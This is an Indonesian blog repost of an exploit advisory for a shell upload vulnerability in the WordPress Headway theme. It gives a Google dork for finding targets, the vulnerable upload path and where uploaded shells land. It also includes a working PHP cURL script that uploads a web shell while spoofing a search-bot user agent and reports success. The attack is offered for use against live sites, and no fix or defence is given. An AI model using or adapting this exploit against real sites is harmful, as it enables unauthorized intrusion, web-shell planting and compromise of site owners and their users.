INDONESIANWARE - Pada Artikel yang anda baca kali ini dengan judul Wordpress Headway Themes Shell Upload Vulnerability, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Aribitraty, Artikel PHP, Artikel Uploadify, Artikel wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Wordpress Headway Themes Shell Upload Vulnerability
link : Wordpress Headway Themes Shell Upload Vulnerability

Wordpress Headway Themes Shell Upload Vulnerability

#-Title: Wordpress Headway Themes Shell Upload Vulnerability

#-Author: Anonymously

#-Date: 10/27/2015

#- Vendor : headwaythemes. com

#- Developer : Clay Griffith

#- Link Download : headwaythemes. com/pricing/

#-Google Dork: inurl:wp-content/themes/headway-(random)

#- Tested on : Trusty Tahr

#- Fixed in ??

==========================================================================

·        Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php 

·         When Vulnerable : /home/localhost/public_html/

Proof Of Concept :

Tools Coded by Mr.MaGnoM

<?php

/*

link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html

coded by mr magnom

more tools visit my blog  ==> magsec.blogspot.com  :)

so why i didnt make auto exploiter because theme headway dont have one name

for example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/

so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than

write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php

shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site

that script on php for exploit site by site :/

to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html

*/

$url="3xploi7.id"; // link here

$file="lolz.php ";   // ur shell here

$post = array('Filedata'=>"@$file") ;

$ch = curl_init();

curl_setopt ($ch, CURLOPT_URL, "$url");

curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,$post);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

$data = curl_exec($ch);

curl_close($ch);

//print $data;

if($data=="1"){

  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";

}else{

  echo "\nnot infected\n";

}

?>

Shell Acces ?  Here

Sekianlah artikel Wordpress Headway Themes Shell Upload Vulnerability kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Wordpress Headway Themes Shell Upload Vulnerability dengan alamat link https://ware-id.blogspot.com/2015/10/wordpress-headway-themes-shell-upload.html